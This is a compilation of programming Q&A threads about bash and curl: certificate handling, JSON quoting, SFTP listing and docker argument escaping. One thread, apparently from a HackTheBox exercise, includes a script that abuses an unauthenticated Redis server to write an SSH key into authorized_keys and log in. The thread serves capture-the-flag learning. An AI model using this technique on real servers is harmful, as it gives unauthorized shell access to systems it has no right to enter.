File path pointing to variable in bash script - bash

I wonder if it is possible provide instead of file path file content itself. For example curl needs to specify file path to certificate. What to do when I have a certificate in variable?
I can't put it into stdin, because I'm generating xml to send there.
Why I put certificate into variable? Because at the end I'd like to have just one file with script, which can I easily distribute to my colleagues.
The only solution which come to my mind is to save variable to file and then provide file path to curl
read -d '' CERT << "CERTEND"
-----BEGIN CERTIFICATE-----
### something very secret here ###
-----END CERTIFICATE-----
CERTEND
curl -# -k --cert ??? -d #xml.xml -H "Content-Type: application/soap+xml" -H 'SOAPAction: ""' https://1.1.1.1/EndpointPort`

You can use process substitution:
curl --cert <(echo "$CERT") ...
which would create a pipe for you. The output of the command in parentheses goes to this pipe (echo $CERT in our case), and the filename of the pipe is returned.

Related

Passing key and pem file data in curl command not working

I am trying to invoke the API using the curl command but unfortunately, I won't be able to keep the files. I am trying to pass the .key and .pem file's data in the command but I am not able to pass that correctly. Below is my command in my .sh file:
response=$(curl --key "$5" --cert "$6" -k -X "$2" -d "$payload" "$4")
I am calling the script below way:
key="${key}"
pem="${pem}"
bash ./Integration1.sh Provision POST "$payload" https://some-api.com/pr "$key" "$pem"
It gives the below error:
curl: (58) could not load PEM client certificate from -----BEGIN CERTIFICATE-----
This command works fine if I pass the file directly so, is there any way to pass the data via string variables in the curl command?
If you only have your key data in a variable and can't write it to a file yourself for some reason, an alternative solution is to use process substitution.
bash ./Integration1.sh Provision POST "$payload" https://some-api.com/pr \
<(printf '%s' "$key") \
<(printf '%s' "$pem")
This requires bash and still uses files under the hood, but it doesn't require you to manage the files yourself or know where they're located.
--key and --cert take the name of a file containing certificate data, not the certificate data itself.
... "$(cat my_client.key)" "$(cat my_client.pem)"
Should just be
... my_client.key my_client.pem

CURL request fails with error msg "failed to decrypt request"

I have implemented a CURL script to execute API call which requires encrypted string as data, But it gets failed with 'failed to decrypt request'. I have tried with python also (requests and Crypto modules) but failed with same error message.
#!/usr/bin/env bash
output=$(openssl enc -aes-256-cbc -pass pass:xxxxxxx -in msg.txt -base64)
curl -X POST \
"https://api.swing.tradesmartonline.in/api/v1/login-token" \
-H "Content-Type: application/json" \
-d '{"data":"$output","app":"APPLICATION_ID"}'
Output is: {"status":"false","data":"","error_msg":"failed to decrypt
request."}
Where as I am able to decrypt the message in local using below command
echo "$output" | openssl enc -aes-256-cbc -base64 -pass pass:xxxxxxx -d
Thanks in advance
The shell will not expand your variables in a single quoted string. Either:
Use double quotes and escape embedded double quotes with \":
"{\"data\":\"$output\",\"app\":\"APPLICATION_ID\"}"
Use single quotes for static text and double quotes for what contain variables (this means less escaping):
'{"data":"'"$output"'","app":"APPLICATION_ID"}'

curl to SFTP and list files in directory

I am using the below curl command in my shell script to connect to SFTP remote directory.
curl -k "sftp://url.test.com/test_folder" --user "username:password"
Is there a way to list the files in directory test_folder.
Yes: end the URL with a trailing slash, to indicate to curl that it is in fact a directory! Like this:
curl -k sftp://url.test.com/test_folder/ --user "username:password"

Redis Public Keys

I am working on HackTheBox and have come across a question that Google has yet to answer. The current script looks like so:
#!/bin/bash
rm /root/.ssh/id*
ssh-keygen -t rsa
(echo -e "\n\n";cat "/root/.ssh/id_rsa.pub";echo -e "\n\n") > "/root/Desktop/postmanKey.txt"
redis-cli -h 10.10.10.160 flushall
cat "/root/Desktop/postmanKey.txt" | redis-cli -h 10.10.10.160 -x set bb
redis-cli -h 10.10.10.160 save
redis-cli -h 10.10.10.160 set dbfilename "authorized_keys"
redis-cli -h 10.10.10.160 save
ssh -i "/root/.ssh/id_rsa" redis#10.10.10.160
I understand all of it except for one thing. Why do we do (echo -e "\n\n";cat "/root/.ssh/id_rsa.pub";echo -e "\n\n") > "/root/Desktop/postmanKey.txt" to generate a public key with 2 trailing and 2 following newlines? I have done some tinkering and quite a few Google searches but I have yet to turn up the reason why this is necessary. If I push the file to the server without the newlines and then attempt to connect via ssh, I am unable to. My only thought is maybe this is something to do with the common format of private keys:
-----BEGIN RSA PRIVATE KEY-----
....
-----END RSA PRIVATE KEY-----
however, we are connecting with a private key, but pushing to the server a public key... hence why I am lost. Thank you for any information!

How to pass "escape hell" to docker run

I'm trying to pass several commands to an alpine container from powershell\cmd. The problem is: commands have quotes\single quotes\escaped quotes.
Sample command, the actual command is one line, I'm splitting it so it is easier to look at:
docker run neilpang/acme.sh bin/sh -c --%
"acme.sh --issue --dns dns_azure --dnssleep 10 --force -d "domain";
openssl pkcs12 -inkey /acme.sh/domain/domain.key -in /acme.sh/domain/domain.cer -export -out pfx -password pass:password;
curl -X POST -d "{\"certName\":\"certName1\",\"certData\":\"$(tail -n +2 /acme.sh/domain/domain.cer > b64; head -n -1 b64)\"}" url -H Content-Type:application/json;
curl -X POST -d "{\"certName\":\"certName2\",\"certData\":\"$(openssl base64 -in pfx -out b64; cat b64)\"}" url -H Content-Type:application/json"
What I've tried:
Use single quotes around the whole expression (after --%) returns something like quoted string not closed
Using single quotes around json works fine, but $() doesnt get interpreted, so I dont get proper output
escaping " before\after json
without " before\after json, results in some garbage
I never got it to work without --%, but it appears ps does some string manipulations even when using --%
did some experiments with cmd, no luck either.
I'm open to any way of making this work :)
for those requesting errors, here's a sample:
-n: line 1: syntax error: unexpected end of file (expecting ")") # quotes around expression
-p: line 1: syntax error: unterminated quoted string # single quotes around expression
no error, but certData empty # no quotes around json
no quotes in json >> not valid json >> doesnt get parsed # escaped quotes around json
executing the strings i'm trying to pass inside the containers results in the working "solution", whereas trying to pass them through docker run results in different defects described above. I'm not sure where these arise, from powershell (although, i firmly believe --% does the work here, and powershell passes everything properly), docker or bash itself. the closest i got to working is the ' version, but it doesnt evaluate expression inside $(), so that the problem
You'll find the quoting issues significantly easier if you turn your very long, very involved command line into a shell script, package it into a custom image, and then run that.
Shell script, let's call it run_acme.sh:
#!/bin/sh
acme.sh --issue --dns dns_azure --dnssleep 10 --force -d "domain"
openssl pkcs12 \
-inkey /acme.sh/domain/domain.key \
-in /acme.sh/domain/domain.cer \
-export \
-out pfx \
-password pass:password
CER_B64=$(tail -n +2 /acme.sh/domain/domain.cer | head -n -1)
curl -X POST \
--data-binary "{\"certName\":\"certName1\",\"certData\":\"$CER_B64\"}" \
-H 'Content-Type: application/json'
url
PFX_B64=$(openssl base64 -in pfx)
curl -X POST \
--data-binary "{\"certName\":\"certName1\",\"certData\":\"$PFX_B64\"}" \
-H 'Content-Type: application/json'
url
Dockerfile:
FROM neilpang/acme.sh
COPY run_acme.sh /bin
CMD ["/bin/run_acme.sh"]
Then you can docker build this like any other custom image, and docker run it, and the very long command line will be baked into the shell script in your image.
I'd suggest using splatting to make this significantly cleaner to maintain. Note: I'm uncertain whether your shell script needs to escape the quotes around the -d parameter.
$curl1 = '"{\"certName\":\"certName1\",' +
'\"certData\":\"$(tail -n +2 /acme.sh/domain/domain.cer > b64; head -n -1 b64)\"}"'
$curl2 = '"{\"certName\":\"certName2\",' +
'\"certData\":\"$(openssl base64 -in pfx -out b64; cat b64)\"}"'
$dockerArgs = #(
'run', 'neilpang/acme.sh', 'bin/sh', '-c'
'"acme.sh --issue --dns dns_azure --dnssleep 10 --force -d "domain";' +
'openssl pkcs12 -inkey /acme.sh/domain/domain.key -in /acme.sh/domain/domain.cer ' +
'-export -out pfx -password pass:password;' +
"curl -X POST -d $curl1 url -H Content-Type:application/json;" +
"curl -X POST -d $curl2 url -H Content-Type:application/json"""
)
docker.exe #dockerArgs
The powershell escape character is a grave-accent ` or you could double-up on the quotes "" to escape double-quotes "`"".

Resources